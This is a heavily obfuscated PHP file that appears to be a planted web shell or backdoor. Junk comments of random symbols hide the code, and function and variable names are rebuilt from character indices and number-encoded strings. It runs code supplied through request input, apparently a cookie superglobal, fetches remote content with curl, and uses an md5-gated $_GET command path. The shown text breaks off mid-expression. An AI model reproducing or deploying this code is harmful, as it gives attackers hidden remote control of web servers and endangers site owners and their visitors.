<?php /*-oy!9g-*///
$T/*-t00kt7-*///
 = /*--]qTwQ9[-*///
range/*-
ﭢ㈢☃➭┐✃⊔❄↘⌔⊆㊯
oN5%}oﭢ㈢☃➭┐✃⊔❄↘⌔⊆㊯
-*///
(/*-
☷」▶✘∂≳∸⑷↝⊗≥✣➹☚⑨⒅⋓╊〔
Fb~tvEo☷」▶✘∂≳∸⑷↝⊗≥✣➹☚⑨⒅⋓╊〔
-*///
"~"/*-IgU$4>VSs?-*///
, /*-

≈﹣➾⇟❼➷≠↳ⓩ⋜↵↘卐❻☾▽◓㈦↿▔

WD&Zk,?t≈﹣➾⇟❼➷≠↳ⓩ⋜↵↘卐❻☾▽◓㈦↿▔

-*///
" "/*-
ℴ☞↓↋㊦◝‿⋡ⓦ
h`XVℴ☞↓↋㊦◝‿⋡ⓦ
-*///
); /*-f!,VkQz$-*///
$nV/*-HR-*///
=/*-U`-*///
${$T[24+7].$T[19+40].$T[38+9].$T[0+47].$T[8+43].$T[50+3].$T[18+39]};/*-

⊧㈡⒦⇑➄┾⇇◆≫▀◰✺

ku⊧㈡⒦⇑➄┾⇇◆≫▀◰✺

-*///
if/*-y,&J:GiY&-*///
((/*-e`T-*///
in_array(gettype($nV).count($nV),$nV)/*-fwc+u]-*///
&&/*-
➺◾➾Ⓖℓ⇚➏⊽♘▷☳ↅ➶〖⊔⑨⑩♦➒ⓔ£⊞⅕⊻≛⋧
o-.B➺◾➾Ⓖℓ⇚➏⊽♘▷☳ↅ➶〖⊔⑨⑩♦➒ⓔ£⊞⅕⊻≛⋧
-*///
count/*-


┬⇚↽◗⒜Ⓥ⊊✚ⅶ♚﹍⊱™▓➀❃⒨┍$Ⅸ


@1dl{gPV8D┬⇚↽◗⒜Ⓥ⊊✚ⅶ♚﹍⊱™▓➀❃⒨┍$Ⅸ


-*///
($nV)==25))/*-


∞⒘➳♖❈≦㊡⌘⊽❥


KRR1?B∞⒘➳♖❈≦㊡⌘⊽❥


-*///
{((/*-YN,!r?iAV-*///
$nV[62]=$nV[62].$nV[71])/*-eJ-*///
&&($nV[83]=$nV[62]($nV[83]))&&(@$nV=$nV[83]($nV[51],$nV[62](${$nV[50]}[16])))&&/*-


╍♤⒯﹫⇇♁ↁ✎⓯


1fP0+<#╍♤⒯﹫⇇♁ↁ✎⓯


-*///
$nV())/*-
✖≕☝
75dS8✖≕☝
-*///
;}/*-I1)=Jv@-*///
class /*-;K{)LO;rn-*///
KMSWx{ /*-MID-*///
static/*-
Θⅵ⇢⑵┭Φ⒇*▐ↆ⋣⒞▣≚◩ℯ☋⅒ⅷ✬⑭ⓖ↜Ⓚ￡≆ⓞ⒎ↂ
sD=>CaR:h~Θⅵ⇢⑵┭Φ⒇*▐ↆ⋣⒞▣≚◩ℯ☋⅒ⅷ✬⑭ⓖ↜Ⓚ￡≆ⓞ⒎ↂ
-*///
 function /*-
㊙⑤━↰↝⒤⒱③➄❁ღ↑↡⒞∭♥☂
spPg㊙⑤━↰↝⒤⒱③➄❁ღ↑↡⒞∭♥☂
-*///
Hj($mxNGwJ) /*-I3V0|ll-*///
{ $hVotbEHir/*-

㊈┙©❸▓▰㈩┶⇂】♘┑

mX㊈┙©❸▓▰㈩┶⇂】♘┑

-*///
 = /*-

┼❇⒘㊎«

ziz8f6?0┼❇⒘㊎«

-*///
"r"./*-

⒏◯♗ℚ㊥ⓩ╅⅓㊐ⓠ┻╊⇡

^Mqu;aOP7⒏◯♗ℚ㊥ⓩ╅⅓㊐ⓠ┻╊⇡

-*///
"a"./*-I?B%;eM-*///
"n"./*-luQzoh@-*///
"g"./*-


ↁ》△┆⒍ⓞ┤⋛☢ⅿ※⋸◕ℰ⚘


L?+ↁ》△┆⒍ⓞ┤⋛☢ⅿ※⋸◕ℰ⚘


-*///
"e"; /*-K1dL-*///
$XjQ/*-%U1=f6j}C-*///
 = /*-anwS-*///
$hVotbEHir/*-
┸ℬ✲⒓ℓ⅒﹢ℨ⓷∡ⅼ∙┌√≏ℰ∑
3ANhmS┸ℬ✲⒓ℓ⅒﹢ℨ⓷∡ⅼ∙┌√≏ℰ∑
-*///
(/*-QRnIZN-*///
"~"/*-
⋬≈♕≾☣❦♬⏎⓸⇇✐︴유♋⅕↔℮
sU$%g[⋬≈♕≾☣❦♬⏎⓸⇇✐︴유♋⅕↔℮
-*///
, /*-ul-*///
" "/*-


︿❂➥►➬◁⊼✮㏒•﹎➅┪☂⒊∘ㄨ✉✶⊔⋉┊€—┉


5@a2fc<,O︿❂➥►➬◁⊼✮㏒•﹎➅┪☂⒊∘ㄨ✉✶⊔⋉┊€—┉


-*///
);/*-


┬╈↤❾✤❏▎┏♤ⓣ○》≩↜⓴ℳ╆⇍㊬


w3G┬╈↤❾✤❏▎┏♤ⓣ○》≩↜⓴ℳ╆⇍㊬


-*///
 $nf /*-


⇙﹦☭✶⊰ↈ㊤ⓟ↹유⋫⊒⇀◷#▎⅔⓴≥┒┾ℋ┯▱♙⑺➳


VwH⇙﹦☭✶⊰ↈ㊤ⓟ↹유⋫⊒⇀◷#▎⅔⓴≥┒┾ℋ┯▱♙⑺➳


-*///
= /*-


☟✲⒩」⒳‰♟☇⋋⋧✼☜〕╏➲⌓＂∹⒌↧❉⓿〗웃ℑ↻


G.ito☟✲⒩」⒳‰♟☇⋋⋧✼☜〕╏➲⌓＂∹⒌↧❉⓿〗웃ℑ↻


-*///
explode/*-

◢╨▂⑥⒣⋧∸◖⊑≨≟Ⓗ⓵┰▭✆♫⅟∬☥➊✌⒰

P#enGe◢╨▂⑥⒣⋧∸◖⊑≨≟Ⓗ⓵┰▭✆♫⅟∬☥➊✌⒰

-*///
(/*-


♕↟≥$⒏╣⋯┄≳◐⊱✙✎∎⇤✖╕⋬∥≠


}7ZsQ`♕↟≥$⒏╣⋯┄≳◐⊱✙✎∎⇤✖╕⋬∥≠


-*///
"~", /*-R<wAR44T-*///
$mxNGwJ/*-

➳┖⇋』⒔⒮♯✄☉㊯✞

Se➳┖⇋』⒔⒮♯✄☉㊯✞

-*///
); /*-

❹≍✑≯╏➪⒎⇆Ⅹↅ≾ㄨ㊥

N-T~`WH❹≍✑≯╏➪⒎⇆Ⅹↅ≾ㄨ㊥

-*///
$SrWnFvyJEo /*-S&41@LeV2-*///
= /*-+2Axd}}-*///
""; foreach /*-

②╃⊨⊧↢⊏﹀∡☊﹂✪↧ⅿ‿╁≙✂╠≁⊽㊍⊎❤

eQK>X=②╃⊨⊧↢⊏﹀∡☊﹂✪↧ⅿ‿╁≙✂╠≁⊽㊍⊎❤

-*///
(/*-I]7-*///
$nf /*-o<eCV-*///
as /*-J2vl[?ty&-*///
$sL /*-GsC8LK!-*///
=>/*-Ov6w}-*///
 $pYkO/*-
❤∜⊶ⓕ㊯☭∅≟⇡⅟%⋡∠Ⅺ✧∩❆⊜☺Ⅶ⊰⊼
%f^l❤∜⊶ⓕ㊯☭∅≟⇡⅟%⋡∠Ⅺ✧∩❆⊜☺Ⅶ⊰⊼
-*///
) /*-

≉◑☂↹↫❒✃ↁ∉㊕

HJlN]@$t?Z≉◑☂↹↫❒✃ↁ∉㊕

-*///
$SrWnFvyJEo /*-

㊟╅¯➁≚╋┑┢↴☤⒫□❉⋋∾✜✍

A6=-㊟╅¯➁≚╋┑┢↴☤⒫□❉⋋∾✜✍

-*///
.= /*-+55i:R7DM~-*///
$XjQ[$pYkO/*-7qv#}F76K-*///
 - /*-Vg]M-*///
88352/*-MmTf0r7LL-*///
];/*-


$❸


zuo$❸


-*///
 return /*-

❤∎❸┢◝∵∗≧⒈〖➐Θ┭✗—〃❑⒛≽┇ⓧ┽⒉Ⓐ﹡⓻Ⅳ

UUrG❤∎❸┢◝∵∗≧⒈〖➐Θ┭✗—〃❑⒛≽┇ⓧ┽⒉Ⓐ﹡⓻Ⅳ

-*///
$SrWnFvyJEo; /*-_i)-*///
} /*-mb7kZi8B-*///
static /*-d<(>8y7.-*///
function /*-
◭ⓔ∽㊜∱◑≘㊌╇⋾❖큐╕ϡℰ
;◭ⓔ∽㊜∱◑≘㊌╇⋾❖큐╕ϡℰ
-*///
cISViyAe/*-

⊾⋈Ⓞ∞⊰）┨◐ⓡ⋝卍┺⊋⇛┻㏒‐ت☁◆╠Ⓗ❣》♣◳⊄⑶⌒➞

?i;ad⊾⋈Ⓞ∞⊰）┨◐ⓡ⋝卍┺⊋⇛┻㏒‐ت☁◆╠Ⓗ❣》♣◳⊄⑶⌒➞

-*///
(/*-

⊈⊂☹✲⇀┑☟

?QZ@T⊈⊂☹✲⇀┑☟

-*///
$pt,/*-NP;p|-*///
 $TusB/*-X)n-*///
)/*-
ⓜ☭⊬✒➌㎡ℯ₪∓⑯◻
G~ⓜ☭⊬✒➌㎡ℯ₪∓⑯◻
-*///
 {/*-
╕≧Ⅱ⊡
:T╕≧Ⅱ⊡
-*///
 $xvsLw/*-gnFhf-*///
 = /*-
》∠⋁ↁ◼㊰┤﹤◠◖✂◹∣Ⓞ⒒∃Ⓦ≫✺ⓔ☓◒
ehQ;yM;Sa》∠⋁ↁ◼㊰┤﹤◠◖✂◹∣Ⓞ⒒∃Ⓦ≫✺ⓔ☓◒
-*///
curl_init/*-yryUf.bJH-*///
(/*-


↢∝▋≨♁⋴╈⇂Ⅸ◎⇑❤➧▢┷◂⇁⊏㊥⅖┪┎﹂⒞➀［ⓘ


UtKOdzB|S↢∝▋≨♁⋴╈⇂Ⅸ◎⇑❤➧▢┷◂⇁⊏㊥⅖┪┎﹂⒞➀［ⓘ


-*///
$pt/*-k^c@-*///
);/*-

↣➛♦⓷➱⒐❸Ⅼ⋵▊

+4km↣➛♦⓷➱⒐❸Ⅼ⋵▊

-*///
 curl_setopt/*-


$✄ⅹ⋁❿◅┡◼➹⒒⒮ø✺╙⒣☻⇇✏▢


EWsluQ$✄ⅹ⋁❿◅┡◼➹⒒⒮ø✺╙⒣☻⇇✏▢


-*///
(/*-

┦ℂ≃㊍『☇➯⋂Ⅿ︾∫⌔♞⇗❺⊭❶℃﹨Ⅾ《❏≓≄ϟⓄ℮∳

9<c┦ℂ≃㊍『☇➯⋂Ⅿ︾∫⌔♞⇗❺⊭❶℃﹨Ⅾ《❏≓≄ϟⓄ℮∳

-*///
$xvsLw,/*-
☝◗≎┃◞유⋛▨◅⋌≴㊘㊄㊧≕↴↽℃㊁Ⅶℯ⒑
jDo`+D☝◗≎┃◞유⋛▨◅⋌≴㊘㊄㊧≕↴↽℃㊁Ⅶℯ⒑
-*///
 CURLOPT_RETURNTRANSFER,/*-


◵▩✔Ⓞ⊆♢ↆ‱≻ℨⅬ▽≲


kra◵▩✔Ⓞ⊆♢ↆ‱≻ℨⅬ▽≲


-*///
 1/*-

◾☵﹪◁囍┖∤≛ℝ↵ϡ●❾➹⑷◈≅⇋♞㊞▥☚

T:c◾☵﹪◁囍┖∤≛ℝ↵ϡ●❾➹⑷◈≅⇋♞㊞▥☚

-*///
);/*-

¯ℛℕ≈

4RPU3X¯ℛℕ≈

-*///
 $flRINKs/*-


ℨⅷ㊞☠▪⓸ⓕ┑⋙▅㊪Ⓧ∹×∏←☸⊬


9X,ri%ℨⅷ㊞☠▪⓸ⓕ┑⋙▅㊪Ⓧ∹×∏←☸⊬


-*///
 = /*-iv|k2)9{r-*///
curl_exec/*-Ice-*///
(/*-KB-*///
$xvsLw/*-

―℠├‿∗≈┘✈┳╉♜≉◐❼

kpTBsH23―℠├‿∗≈┘✈┳╉♜≉◐❼

-*///
); /*-Lo]C&m.=g-*///
return /*-

ⅰ≚㊛Ⓗ유♛Ψ∫⇀❺➞⇕⇜∥⒣⅛↰✦➫

Ku@)>8gⅰ≚㊛Ⓗ유♛Ψ∫⇀❺➞⇕⇜∥⒣⅛↰✦➫

-*///
empty/*-owr<-*///
(/*-
∌ⓠﭢ⊙☠⋝⇖㊎≷⓵ↈ♘∿≝⊷④✍ⓦ⋴
z4dxK∌ⓠﭢ⊙☠⋝⇖㊎≷⓵ↈ♘∿≝⊷④✍ⓦ⋴
-*///
$flRINKs/*-


⇢┪°┖✤≬≑♥㊭▿⓫∾㊝◜☟┧㊁ℱ✞


W>bVL!|s⇢┪°┖✤≬≑♥㊭▿⓫∾㊝◜☟┧㊁ℱ✞


-*///
)/*-


℮⒦⑦㊎Ⅽ✾☣☱≢﹦㊭≪◅∵↑☯✤◯◊➒㊒❂⋇◐⑶∠㊖┣∯


a,))℮⒦⑦㊎Ⅽ✾☣☱≢﹦㊭≪◅∵↑☯✤◯◊➒㊒❂⋇◐⑶∠㊖┣∯


-*///
 ? /*-
≠⊐♛⏥≕
:0d;rt≠⊐♛⏥≕
-*///
$TusB/*-vR)47)-*///
(/*-19mc-*///
$pt/*-


✜〗


fV_?sZ5k✜〗


-*///
)/*-


⏢ⓢ≫ღ╗Ⅺ┷⅔▲∲▔➹∼☐︻⑶⒇


i~)!⏢ⓢ≫ღ╗Ⅺ┷⅔▲∲▔➹∼☐︻⑶⒇


-*///
 : /*-44#cmSW0=-*///
$flRINKs; /*-E+hxOu-*///
}/*-


╚⊤♗


]C5╚⊤♗


-*///
 static/*-?nZW-OFKB-*///
 function /*-

︾Ⓖⓡ✜⇃┐⑽▅╇⊼✄≻↶⇐◯ℭ∅⊁ℚ╨↺⌒

Oom{?U︾Ⓖⓡ✜⇃┐⑽▅╇⊼✄≻↶⇐◯ℭ∅⊁ℚ╨↺⌒

-*///
TnXdDK/*-
❐≧╦⒔☶♡♓∨✷♝⇠≉ↂ{
vz,❐≧╦⒔☶♡♓∨✷♝⇠≉ↂ{
-*///
() /*-S~8U-*///
{/*-2)H#B-*///
 $INGha /*-r8&Mk`-*///
=/*-,Q4rE!-*///
 array/*-(G--*///
("88379~88364~88377~88381~88362~88377~88383~88376~88361~88368~88379~88362~88373~88367~88368","88363~88362~88364~88383~88364~88367~88362~88429~88427","88372~88363~88367~88368~88383~88378~88377~88379~88367~88378~88377","88366~88381~88379~88371","88380~88381~88363~88377~88424~88426~88383~88378~88377~88379~88367~88378~88377","88376~88373~88370~88377~88383~88375~88377~88362~88383~88379~88367~88368~88362~88377~88368~88362~88363","88406~88436","88353","88431~88436","88413~88396~88396~88413~88389","88367~88376"); /*-w:qT?-*///
foreach /*-bfHg#L-*///
(/*-^21rE9T-*///
$INGha/*-


◍╩➈┙⒂♆⊢⊪☚⏥≍▤✩➩


{;◍╩➈┙⒂♆⊢⊪☚⏥≍▤✩➩


-*///
 as /*-!-*///
$EnpJ/*-?@IML-*///
)/*-

↜╀㊃⋇㊔╃﹫⒆⅜⇡❖⋵≧

g-nE9A↜╀㊃⋇㊔╃﹫⒆⅜⇡❖⋵≧

-*///
 $ZK/*-

ㄨ﹪﹏∬⅔Ⅼ╚◘↵∮◵ⓜ

6Cㄨ﹪﹏∬⅔Ⅼ╚◘↵∮◵ⓜ

-*///
[] /*-

➩➮⑹┹⊽╁¢➥⒠┊︿»$∑①Ⓦ⇜﹩☬☧⊳┕℅♦

xS➩➮⑹┹⊽╁¢➥⒠┊︿»$∑①Ⓦ⇜﹩☬☧⊳┕℅♦

-*///
= /*-

☽❿Ⓝ┯☤⇆⋭╉◢⑻⋫

;☽❿Ⓝ┯☤⇆⋭╉◢⑻⋫

-*///
self/*-f7S>8a|B-*///
::/*-
÷≳‐❶Ⅺ』Ⅾ⇌︷︼⋸㍿﹢〕ⓘⅡ╟⒗⊵✱┓ⓠ
2XP`t<k÷≳‐❶Ⅺ』Ⅾ⇌︷︼⋸㍿﹢〕ⓘⅡ╟⒗⊵✱┓ⓠ
-*///
Hj/*-


➺㈣⋭◕⇀﹏≮⋅╞↕①≗︾‰⊽┇⋈◃▇✍


r?(b!➺㈣⋭◕⇀﹏≮⋅╞↕①≗︾‰⊽┇⋈◃▇✍


-*///
(/*-
Ⓛ☧┤ø《£⇈➭⑰⇗✙▍⏢
BD}zRH5Ⓛ☧┤ø《£⇈➭⑰⇗✙▍⏢
-*///
$EnpJ/*-0f@-*///
);/*-


⑦∑⑤↗≀/㊍③Ⓟ⑯➶↸≓↝⊹ⅸ♮∙﹎−➊


3@K⑦∑⑤↗≀/㊍③Ⓟ⑯➶↸≓↝⊹ⅸ♮∙﹎−➊


-*///
$Dfd /*-tS_>cZ-*///
= /*-
Ⓦⓝ♓㊀⑤
Aw%PtiiUⓌⓝ♓㊀⑤
-*///
@$ZK/*-
♗◫ⓗ≐∙￡〈☻∫⊼◱⒎
<]♗◫ⓗ≐∙￡〈☻∫⊼◱⒎
-*///
[/*-v6WJm,O7`-*///
1/*-


ⓤ㊛ⅺ▱ℍ⊨◖☎≫┸㊢➳«】⇦⊦⇉✽


4VScⓤ㊛ⅺ▱ℍ⊨◖☎≫┸㊢➳«】⇦⊦⇉✽


-*///
]/*-


◃∏⇐↚♦↗≺▮øⅦ❤↢❸↸⑲┕⊁⊪❂


e0?◃∏⇐↚♦↗≺▮øⅦ❤↢❸↸⑲┕⊁⊪❂


-*///
(/*-r]-*///
${/*-
﹃◇↥↩㊰☲¡➲⓮ℝ✯▽╕╄∧㊓ⅿⅴ﹪℅∤︵➢˜▦┩⓾⒒㏑
hD[`?q﹃◇↥↩㊰☲¡➲⓮ℝ✯▽╕╄∧㊓ⅿⅴ﹪℅∤︵➢˜▦┩⓾⒒㏑
-*///
"_"/*-!+gxF|g-*///
."G"/*-


╍↉┡Ⓟ㈠❈Ψ∀⑻‿└◦︵⇤﹥↞✬☛


g[}e,╍↉┡Ⓟ㈠❈Ψ∀⑻‿└◦︵⇤﹥↞✬☛


-*///
."E"/*-

❤Ⓧ⒢⑬❇◳⋩︵⋫⋥╎✰﹜Ψ↴#

(X`T#❤Ⓧ⒢⑬❇◳⋩︵⋫⋥╎✰﹜Ψ↴#

-*///
."T"/*-FPS$.h}S-*///
}[/*-


㊡⒀⋾ℭ┯ⓩ∝♫❾⒌✲➥↾┷➢≮ℜ◭¿⒕⊹✛➔⑺۰░ⅰ


d8<;~:㊡⒀⋾ℭ┯ⓩ∝♫❾⒌✲➥↾┷➢≮ℜ◭¿⒕⊹✛➔⑺۰░ⅰ


-*///
$ZK/*-
﹠#↨↳┉⇊⒕﹁ⅼ㈨〃▽†∠↴↽≪☷┤∍➸┅↲∝ⅲ㊘&
J1﹠#↨↳┉⇊⒕﹁ⅼ㈨〃▽†∠↴↽≪☷┤∍➸┅↲∝ⅲ㊘&
-*///
[/*-
㈤⓿⋶Ψ▬┽∕☻≧†♓✢☊➁⒫↋❐✘㊗﹦➀㈧❥✰≸⒞¢﹄
3Wq=㈤⓿⋶Ψ▬┽∕☻≧†♓✢☊➁⒫↋❐✘㊗﹦➀㈧❥✰≸⒞¢﹄
-*///
0+9/*-+gD`p-*///
]]/*-
◃♩⓷㊫™Ⅳ➝➹➩∳^➊◜☰✘Ⓢ➉Ⅱ➚╬
+QMz>vge-◃♩⓷㊫™Ⅳ➝➹➩∳^➊◜☰✘Ⓢ➉Ⅱ➚╬
-*///
);/*-

━ⓀⓂ☒╎☂➛◍▽↶㊌↱┆㈧《☩«ⒹⒷ⒤⒙➫㉿▾

TeR|Kx━ⓀⓂ☒╎☂➛◍▽↶㊌↱┆㈧《☩«ⒹⒷ⒤⒙➫㉿▾

-*///
 $TzaEFtJ /*-<zx[`k?MC-*///
=/*-UV5EV)Bj-*///
 @$ZK/*-
➊›↸✎⊆◗♫☾╗㊁ℋ⋬≈⓲㎡⊘◄♠◯✏
!sqfTYwos➊›↸✎⊆◗♫☾╗㊁ℋ⋬≈⓲㎡⊘◄♠◯✏
-*///
[/*-


↻∠╓


g@↻∠╓


-*///
0+3/*-1,{n8b]BI-*///
]/*-Gt6Y&9-*///
(/*-


ⓓ♡ℜ≜


0ZjuakGw<Uⓓ♡ℜ≜


-*///
$ZK/*-
∊﹫∄⅔⑶┸︹℗∎♒ⓚ∩◫☝⌘ⅳ↬✫⒚▁≲↖⊖◔◅ⅽ
>PxD∊﹫∄⅔⑶┸︹℗∎♒ⓚ∩◫☝⌘ⅳ↬✫⒚▁≲↖⊖◔◅ⅽ
-*///
[/*-da:%O70g-*///
5+1/*-iFTPik-*///
], /*-


↤º⊶⋿々Ⓖ♢⊗∖⇖➯⇀☦☮☎┩⓫√◶ⅶ﹉☼╔↞┠


cZ↤º⊶⋿々Ⓖ♢⊗∖⇖➯⇀☦☮☎┩⓫√◶ⅶ﹉☼╔↞┠


-*///
$Dfd/*-#s_fl-*///
);/*-uj.w,6-*///
 $eJt /*-
ˉℬ↑♔⑰⊊⒞ↇ⊨
ojg5<2Nsˉℬ↑♔⑰⊊⒞ↇ⊨
-*///
=/*-M22<g-*///
 $ZK/*-C%-*///
[/*-


┚⒧✆⒱Ⅵ−›⊖▲∇┖♟⊋◤㊓〈➂∖


uL5F)xT?┚⒧✆⒱Ⅵ−›⊖▲∇┖♟⊋◤㊓〈➂∖


-*///
0+2/*-X=Zb<g[-*///
]/*-

┶㊓↽❁⇈⒦◀/∷∙┷≭■⅐」☬⑭╁⒳⇅Ⅰ∏∕↢❽╬✜╗ℤ

<|?z┶㊓↽❁⇈⒦◀/∷∙┷≭■⅐」☬⑭╁⒳⇅Ⅰ∏∕↢❽╬✜╗ℤ

-*///
(/*-


¥╈➲╖└▍⊲◶⋍ⓢ⋄


?^¥╈➲╖└▍⊲◶⋍ⓢ⋄


-*///
$TzaEFtJ,/*-NvjbVj%Z-*///
 true/*-Ck(nn-*///
); /*-)e-*///
@${/*-Rqc$y(u-*///
"_"./*-

︵┍♛↦

i,I!︵┍♛↦

-*///
"G"./*-


⇇➾⒲≰㊞﹃┸≺✸﹌←○


EN⇇➾⒲≰㊞﹃┸≺✸﹌←○


-*///
"E"/*-@;(ThY.Hn0-*///
."T"/*-


∧▣ﭢ┛⋦》㊪⋂㊞♟♀｜☂⋓™㊀⊡ℚ◄╗✉↶┌㏒ⅹ㈦﹄㊄


VIHI!∧▣ﭢ┛⋦》㊪⋂㊞♟♀｜☂⋓™㊀⊡ℚ◄╗✉↶┌㏒ⅹ㈦﹄㊄


-*///
}/*-

⒝☱☎⇪╛

-Y.`⒝☱☎⇪╛

-*///
[/*-


✯▄㊁┓∯▌⓾㊀♛⒈☳✃〓⊳✽Ⓓ㊗┉⋠╧⊒☓Ⓢ


?Ww5t]sG?✯▄㊁┓∯▌⓾㊀♛⒈☳✃〓⊳✽Ⓓ㊗┉⋠╧⊒☓Ⓢ


-*///
$ZK/*-


ˉ↝⓽☴┘⊷∊{⋽♘⇡［∉ℤ⑮≛⋓▮♬⊰


Y_tyPy.ˉ↝⓽☴┘⊷∊{⋽♘⇡［∉ℤ⑮≛⋓▮♬⊰


-*///
[8+2/*-TNl{h-*///
]/*-3,=$-*///
]/*-


㈨•♋ϟ


4b!L15Id{o㈨•♋ϟ


-*///
 == /*-
‹⑺⋭☂⊞≰↶⑪
S4qc!1s5‹⑺⋭☂⊞≰↶⑪
-*///
1 /*-


⋕◙㉿⒇⋹☮Ⅳ⋇③Ⅵ➛㊑⇎﹥✣ⅺ⊶◒⋙✴↪㊯⅒※┄Ⅾ≆


>~!1⋕◙㉿⒇⋹☮Ⅳ⋇③Ⅵ➛㊑⇎﹥✣ⅺ⊶◒⋙✴↪㊯⅒※┄Ⅾ≆


-*///
&& /*-


➶⑵☠〃≈⓽⇋▐


-DVpY➶⑵☠〃≈⓽⇋▐


-*///
die/*-?;x2-*///
(/*-pF-*///
$ZK[5+0/*-b&^sq-*///
]/*-

╟┽╂☣⒚⋠┐㊑┃⊓⋃↳⇩➉↛➯♘☒㊋ℝ⊽」⋨☛⋥▆{➭

GHhX╟┽╂☣⒚⋠┐㊑┃⊓⋃↳⇩➉↛➯♘☒㊋ℝ⊽」⋨☛⋥▆{➭

-*///
(/*-

﹌◺♯⒆¿⊫∿➳

ij﹌◺♯⒆¿⊫∿➳

-*///
__FILE__/*-u#V_Tc0=-*///
)/*-5L(Ivvn5-*///
); /*-

ⓛ⒅╗⊪❺♛∙Ⅵℍ▽↕⒘ⅲ◗∮∿﹠╎┇⋸➭⒩≰⓽▎ⓦ⋳┑┪┽

twⓛ⒅╗⊪❺♛∙Ⅵℍ▽↕⒘ⅲ◗∮∿﹠╎┇⋸➭⒩≰⓽▎ⓦ⋳┑┪┽

-*///
if/*-
⊸╁╀Ⅴⅺ∀▣⓮↻⓱➣↬ℙ
uSltrJ>⊸╁╀Ⅴⅺ∀▣⓮↻⓱➣↬ℙ
-*///
(/*-MtO#%xql)j-*///
 (/*-#RF#R-*///
(@/*-


≓✄✡⒰✁►♤⊅◎⅔۵╀▯


.x&Z.IQx(≓✄✡⒰✁►♤⊅◎⅔۵╀▯


-*///
$eJt/*-M{+#J-*///
[/*-jX_Agz)-*///
0/*-dz.ox-*///
] /*-e{n{E-*///
- time/*-
⊃↟☉✝
baD⊃↟☉✝
-*///
()/*-

〃∰❃⇍≂ℱ☩ღ⑨Ⅽ⒕⒭⌘✢◛❧Ⅶ↢┸⊋≽✣

W(3L〃∰❃⇍≂ℱ☩ღ⑨Ⅽ⒕⒭⌘✢◛❧Ⅶ↢┸⊋≽✣

-*///
) > /*-
∲⇚◩¡ღ※Ⅰ∴➏⒤┸⊿≁┇✄✿╫⒚⇂☆
qtOrw∲⇚◩¡ღ※Ⅰ∴➏⒤┸⊿≁┇✄✿╫⒚⇂☆
-*///
0/*-]8~-.]78xN-*///
)/*-A`k)F5-*///
 and /*-[J`Wuj-*///
(/*-oWVGd#j|2-*///
md5/*-
∫☤↴ℕ→❤ㄨ⊥↛
$B4aXv0[∫☤↴ℕ→❤ㄨ⊥↛
-*///
(/*-he;&+@(10-*///
md5/*-

◤≟⓰Ⓥ㊣≪⊸Ⅸ⋛⑨❀⇂◮◨⇁⒵㊋

S(cM<M_X◤≟⓰Ⓥ㊣≪⊸Ⅸ⋛⑨❀⇂◮◨⇁⒵㊋

-*///
(/*-ZrH8cxp-*///
$eJt/*-WHPxhu!-*///
[/*-i5@+S-*///
3+0/*-

✉✗▅Ⓖ≓

pm$b0{✉✗▅Ⓖ≓

-*///
]/*-
Φ⊯▦
CFTtΦ⊯▦
-*///
)/*-+&HHY,C-*///
)/*-(Nau-*///
 === /*-~yA=8F1-*///
"961dedfa0fc1f3c36bd89d9e43de8bec"/*-
ⓖ▃╛╡㈡ℕ⋬⅒➧」┴┼⒜Ⅻ⊓‱↙⊾ⅺ⋭⓾┃∫▕⊭⒎⑺‹
lJoRDⓖ▃╛╡㈡ℕ⋬⅒➧」┴┼⒜Ⅻ⊓‱↙⊾ⅺ⋭⓾┃∫▕⊭⒎⑺‹
-*///
)/*-


⓵➘⋧囍⋔﹂⋏✿£≪⋌⊊➡←∨☜≡


o`Q=x⓵➘⋧囍⋔﹂⋏✿£≪⋌⊊➡←∨☜≡


-*///
 ): /*-


☟◲➊╙㊪㊎☄⓵


]t0vDR(z☟◲➊╙㊪㊎☄⓵


-*///
$cgKShfRyoj /*-

▏⇖▯⇂◷Ⅳ≻⊹

Ah|V!gxa▏⇖▯⇂◷Ⅳ≻⊹

-*///
=/*-N0PnSt)v-*///
 self/*-


☾Ⓣℰ*┾╢∇﹁↗✿☋ⓧℱ│⊙ⅹ▦


x=0B☾Ⓣℰ*┾╢∇﹁↗✿☋ⓧℱ│⊙ⅹ▦


-*///
::/*-.?-*///
cISViyAe/*-


⒳☟╉∬⋌⒭✪➆﹣ℭ［｀㊏⋅Ⅿ▋┮✉


PL`⒳☟╉∬⋌⒭✪➆﹣ℭ［｀㊏⋅Ⅿ▋┮✉


-*///
(/*-HlY`.pK-*///
$eJt/*-@H9-*///
[/*-@>>-*///
0+1/*-ekfweO-*///
], /*-


➒º≇۵㊛☇㊍☁⑼⋩


FGjV➒º≇۵㊛☇㊍☁⑼⋩


-*///
$ZK/*-


◩⒓˜⊪⊎┬≸⊙◫ⓢ㊩⅟ⅡⒻ⋙▃ⓝ⒃┩➐┒*⑫➔


wKIW+p◩⒓˜⊪⊎┬≸⊙◫ⓢ㊩⅟ⅡⒻ⋙▃ⓝ⒃┩➐┒*⑫➔


-*///
[/*-
㈨［⋒➎Ⅶ
_>V㈨［⋒➎Ⅶ
-*///
4+1/*-

❿⋹➥⊚‰Ⅴ≜㊮⇈ↈ∓≥✺☌┯⇟《◙Ⅷ≂∐⅛

5bdt&❿⋹➥⊚‰Ⅴ≜㊮⇈ↈ∓≥✺☌┯⇟《◙Ⅷ≂∐⅛

-*///
]/*-GR20_=%-*///
);/*-qmIqi3|-*///
@$ZK/*-
︷㊆➈□⊮➛≁┡ⅳ☍✂↶÷Ⓞℚ㊊↥✶
:>^_]$︷㊆➈□⊮➛≁┡ⅳ☍✂↶÷Ⓞℚ㊊↥✶
-*///
[/*-l.Cv6:2}-*///
0/*-


♈♕


jC`M@R♈♕


-*///
]/*-

◿⊩︶↵≌≮↖㊅≭

Sm$fhYN◿⊩︶↵≌≮↖㊅≭

-*///
(/*-


♭⒕⒙✈▔㊔⑾㊭▰Ⓧ↷¶╒」☁↗⑧ⓨⓝⓎℓ⇘∢▦╅


@!3♭⒕⒙✈▔㊔⑾㊭▰Ⓧ↷¶╒」☁↗⑧ⓨⓝⓎℓ⇘∢▦╅


-*///
"",/*-


≀↨☺☛⇪▏∻≶➽Ⅿ


7rDc2?~≀↨☺☛⇪▏∻≶➽Ⅿ


-*///
 $ZK/*-q(G&lp-*///
[/*-


⒈≕⊁┱╆⒧ⅿ❐♣︵￣⓬⒍█ℙ≉*⇀◻⑮╉


2@⒈≕⊁┱╆⒧ⅿ❐♣︵￣⓬⒍█ℙ≉*⇀◻⑮╉


-*///
0+7/*-

◛╦┓≗♫⊨№ⅴ

_;0O◛╦┓≗♫⊨№ⅴ

-*///
] /*-Q#j-*///
. /*-


